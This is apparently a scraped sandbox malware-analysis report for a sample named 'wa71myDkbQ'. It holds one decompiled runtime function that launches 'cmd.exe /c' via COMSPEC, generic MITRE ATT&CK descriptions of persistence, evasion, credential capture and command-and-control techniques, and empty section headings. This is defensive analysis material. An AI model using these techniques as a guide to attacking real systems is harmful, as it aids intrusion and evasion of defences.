Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: c3b18e5646caee18107b1f23539d5c446b60786c3314b31edd07e0647aa1ce87
Instruction ID: 30ec472c3039161c2d1a552b2a7a444a1e76dfdf5bd13839a6da82a69f9d7939
Opcode Fuzzy Hash: c3b18e5646caee18107b1f23539d5c446b60786c3314b31edd07e0647aa1ce87
Instruction Fuzzy Hash: AB1186322046016BDA1137759C85F3A36EADBC1BB7B2507E4FE24A72F1DEB58C1D8124

Uniqueness

Uniqueness Score: -1.00%

Function 00B5097A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00B5097A(signed int __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				signed int _t18;
				void* _t21;
				char* _t22;
				signed int* _t29;
				signed int _t31;
				intOrPtr* _t32;
				signed int _t35;
				intOrPtr _t46;
				signed int _t49;
				signed int _t55;
				void* _t57;

				L0:
				while(1) {
					L0:
					_t37 = __ebx;
					_pop(_t53);
					_t54 = _t55;
					_t18 =  *0xb69014; // 0x7e8b4fb6
					_v8 = _t18 ^ _t55;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t46 = _a4;
					_t49 = 0;
					_v28 = 0;
					_t21 = E00B5185E( &_v28, 0, "COMSPEC");
					_t57 = _t55 - 0x18 + 0xc;
					if(_t21 == 0 || _t21 != 0x16) {
						break;
					}
					L15:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00B52919();
					asm("int3");
				}
				L3:
				if(_t46 != 0) {
					_t22 = _v32;
					_v28 = _t22;
					_v24 = "/c";
					_v20 = _t46;
					_v16 = _t49;
					if(_t22 == 0) {
						L13:
						_push(_t49);
						_v28 = "cmd.exe";
						_t49 = E00B56D9C(_t37, _t46, _t49, _t49, "cmd.exe",  &_v28);
					} else {
						_t46 =  *((intOrPtr*)(E00B55BBD()));
						_t29 = E00B55BBD();
						_push(_t49);
						 *_t29 = _t49;
						_push( &_v28);
						_t31 = E00B56AC5(_t49, _v28);
						_t57 = _t57 + 0x10;
						_t37 = _t31;
						_t32 = E00B55BBD();
						if(_t37 == 0xffffffff) {
							if( *_t32 == 2 ||  *((intOrPtr*)(E00B55BBD())) == 0xd) {
								 *((intOrPtr*)(E00B55BBD())) = _t46;
								goto L13;
							} else {
								_t49 = _t49 | 0xffffffff;
							}
						} else {
							 *_t32 = _t46;
							_t49 = _t37;
						}
					}
				} else {
					if(_v32 != _t49) {
						_t35 = E00B56EA8(_t37, _t49, _v32, _t49);
						asm("sbb esi, esi");
						_t49 =  ~_t35 + 1;
					}
				}
				E00B564B8(_v32);
				return E00B4AE43(_v12 ^ _t54);
			}

APIs

_free.LIBCMT ref: 00B50956

Strings

cmd.exe, xrefs: 00B5093E, 00B50944
COMSPEC, xrefs: 00B50897

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: COMSPEC$cmd.exe
API String ID: 269201875-2256226045
Opcode ID: b5bd56889811003dd9b44178221e01aca244daf1b5e958918efac45300aaca9e
Instruction ID: 224764720d3e285de2a336df5b5cbf286f262e90e6062d9f08e42b1966079534
Opcode Fuzzy Hash: b5bd56889811003dd9b44178221e01aca244daf1b5e958918efac45300aaca9e
Instruction Fuzzy Hash: 3A31B5719111199F9B20BF998846BAFBBF8DE41322B2101E5FD14A7251EB745E08CBE1

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Services
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. Within MFT entries are file attributes, such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files).
Tactics:	Defense Evasion
Data Sources:	API monitoring, File monitoring, Process command-line parameters
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report wa71myDkbQ

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Protection of GUI:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre